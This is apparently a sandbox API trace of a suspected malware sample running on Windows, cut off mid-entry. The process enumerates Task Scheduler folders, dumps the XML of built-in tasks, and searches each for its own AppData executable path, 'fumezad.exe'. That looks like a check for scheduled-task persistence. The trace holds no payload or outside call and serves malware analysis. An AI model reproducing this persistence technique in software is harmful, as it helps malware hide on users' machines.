ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.779] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0228.781] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0228.781] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.781] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="BackgroundConfigSurveyor") returned 0x0 [0228.781] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2003)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2002)\r\n Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor\r\n \r\n \r\n \r\n \r\n 2008-05-30T03:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {EA9155A3-8A39-40b4-8963-D3C761B18371}\r\n \r\n \r\n") returned 0x0 [0228.783] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2003)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2002)\r\n Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor\r\n \r\n \r\n \r\n \r\n 2008-05-30T03:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {EA9155A3-8A39-40b4-8963-D3C761B18371}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.805] IUnknown:Release (This=0x297030) returned 0x0 [0228.805] IUnknown:Release (This=0x296ee0) returned 0x0 [0228.805] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0228.806] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.806] IUnknown:Release (This=0x296ee0) returned 0x0 [0228.806] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.806] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x16, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.806] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0228.807] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=0) returned 0x0 [0228.807] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.807] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0228.808] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=1) returned 0x0 [0228.808] ITaskFolderCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x12de80 | out: ppFolder=0x12de80*=0x297020) returned 0x0 [0228.809] ITaskFolder:GetTasks (in: This=0x297020, flags=1, ppTasks=0x12dd00 | out: ppTasks=0x12dd00*=0x2970c0) returned 0x0 [0228.809] IRegisteredTaskCollection:get_Count (in: This=0x2970c0, pCount=0x12de60 | out: pCount=0x12de60*=0) returned 0x0 [0228.809] IUnknown:Release (This=0x2970c0) returned 0x0 [0228.809] ITaskFolder:GetFolders (in: This=0x297020, flags=0, ppFolders=0x12dd08 | out: ppFolders=0x12dd08*=0x2970c0) returned 0x0 [0228.810] ITaskFolderCollection:get_Count (in: This=0x2970c0, pCount=0x12de78 | out: pCount=0x12de78*=0) returned 0x0 [0228.810] IUnknown:Release (This=0x2970c0) returned 0x0 [0228.810] TaskScheduler:IUnknown:Release (This=0x297020) returned 0x0 [0228.810] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.810] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.810] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.810] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296f00) returned 0x0 [0228.812] IRegisteredTaskCollection:get_Count (in: This=0x296f00, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0228.812] IRegisteredTaskCollection:get_Item (in: This=0x296f00, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297070) returned 0x0 [0228.812] IRegisteredTask:get_Name (in: This=0x297070, pName=0x12dea0 | out: pName=0x12dea0*="AnalyzeSystem") returned 0x0 [0228.812] IRegisteredTask:get_Xml (in: This=0x297070, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n $(@%systemRoot%\\system32\\energy.dll,-101)\r\n $(@%systemRoot%\\system32\\energy.dll,-103)\r\n $(@%systemRoot%\\system32\\energy.dll,-102)\r\n 1.0\r\n \r\n \r\n \r\n 2008-01-01T06:00:00\r\n PT8H\r\n \r\n 14\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n PT5M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n true\r\n PT5M\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\powercfg.exe\r\n -energy -auto\r\n \r\n \r\n") returned 0x0 [0228.814] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n $(@%systemRoot%\\system32\\energy.dll,-101)\r\n $(@%systemRoot%\\system32\\energy.dll,-103)\r\n $(@%systemRoot%\\system32\\energy.dll,-102)\r\n 1.0\r\n \r\n \r\n \r\n 2008-01-01T06:00:00\r\n PT8H\r\n \r\n 14\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n PT5M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n true\r\n PT5M\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\powercfg.exe\r\n -energy -auto\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.844] IUnknown:Release (This=0x297070) returned 0x0 [0228.844] IUnknown:Release (This=0x296f00) returned 0x0 [0228.844] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296f00) returned 0x0 [0228.845] ITaskFolderCollection:get_Count (in: This=0x296f00, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.845] IUnknown:Release (This=0x296f00) returned 0x0 [0228.845] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.845] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x18, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.845] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0228.847] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0228.847] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297010) returned 0x0 [0228.847] IRegisteredTask:get_Name (in: This=0x297010, pName=0x12dea0 | out: pName=0x12dea0*="RacTask") returned 0x0 [0228.847] IRegisteredTask:get_Xml (in: This=0x297010, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-502)\r\n Microsoft\\Windows\\RAC\\RacTask\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n PT1H\r\n false\r\n \r\n 2008-03-31T00:00:00Z\r\n true\r\n PT15M\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {42060D27-CA53-41f5-96E4-B1E8169308A6}\r\n \r\n \r\n \r\n") returned 0x0 [0228.855] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-502)\r\n Microsoft\\Windows\\RAC\\RacTask\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n PT1H\r\n false\r\n \r\n 2008-03-31T00:00:00Z\r\n true\r\n PT15M\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {42060D27-CA53-41f5-96E4-B1E8169308A6}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.890] IUnknown:Release (This=0x297010) returned 0x0 [0228.890] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.890] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0228.891] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.891] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.891] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.891] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.891] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0228.893] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0228.893] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297010) returned 0x0 [0228.893] IRegisteredTask:get_Name (in: This=0x297010, pName=0x12dea0 | out: pName=0x12dea0*="MobilityManager") returned 0x0 [0228.893] IRegisteredTask:get_Xml (in: This=0x297010, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Ras\\MobilityManager\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"Application\"\r\n >\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {c463a0fc-794f-4fdf-9201-01938ceacafa}\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n \r\n") returned 0x0 [0228.895] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Ras\\MobilityManager\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"Application\"\r\n >\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {c463a0fc-794f-4fdf-9201-01938ceacafa}\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.958] IUnknown:Release (This=0x297010) returned 0x0 [0228.958] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.958] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0228.959] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.959] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.959] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.959] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1a, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.959] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0228.960] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0228.960] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0228.960] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="RegIdleBackup") returned 0x0 [0228.960] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n Microsoft\\Windows\\Registry\\RegIdleBackup\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n 10\r\n \r\n PT1H\r\n \r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n false\r\n true\r\n 5\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {ca767aa8-9157-4604-b64b-40747123d5f2}\r\n \r\n \r\n") returned 0x0 [0228.962] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n Microsoft\\Windows\\Registry\\RegIdleBackup\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n 10\r\n \r\n PT1H\r\n \r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n false\r\n true\r\n 5\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {ca767aa8-9157-4604-b64b-40747123d5f2}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.993] IUnknown:Release (This=0x297020) returned 0x0 [0228.993] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.993] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0228.995] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.995] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.995] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.995] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.995] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296f10) returned 0x0 [0228.996] IRegisteredTaskCollection:get_Count (in: This=0x296f10, pCount=0x12dff0 | out: pCount=0x12dff0*=0) returned 0x0 [0228.996] IUnknown:Release (This=0x296f10) returned 0x0 [0228.996] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296f10) returned 0x0 [0228.997] ITaskFolderCollection:get_Count (in: This=0x296f10, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.997] IUnknown:Release (This=0x296f10) returned 0x0 [0228.997] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.997] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1c, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.997] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0228.998] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0228.998] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297040) returned 0x0 [0228.999] IRegisteredTask:get_Name (in: This=0x297040, pName=0x12dea0 | out: pName=0x12dea0*="RemoteAssistanceTask") returned 0x0 [0228.999] IRegisteredTask:get_Xml (in: This=0x297040, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n PT15S\r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Queue\r\n false\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n") returned 0x0 [0229.001] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n PT15S\r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Queue\r\n false\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.039] IUnknown:Release (This=0x297040) returned 0x0 [0229.039] IUnknown:Release (This=0x296ee0) returned 0x0 [0229.039] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0229.040] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0229.040] IUnknown:Release (This=0x296ee0) returned 0x0 [0229.040] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0229.040] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0229.040] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0229.042] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=2) returned 0x0 [0229.042] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0229.042] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="WindowsParentalControls") returned 0x0 [0229.042] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControls\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n false\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 5\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n {DFA14C43-F385-4170-99CC-1B7765FA0E4A}\r\n \r\n \r\n") returned 0x0 [0229.044] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControls\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n false\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 5\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n {DFA14C43-F385-4170-99CC-1B7765FA0E4A}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0229.074] IUnknown:Release (This=0x297020) returned 0x0 [0229.074] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0229.074] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="WindowsParentalControlsMigration") returned 0x0 [0229.074] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n true\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 1\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {343D770D-7788-47c2-B62A-B7C4CED925CB}\r\n \r\n \r\n") returned 0x0 [0229.076] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-302)\r\n 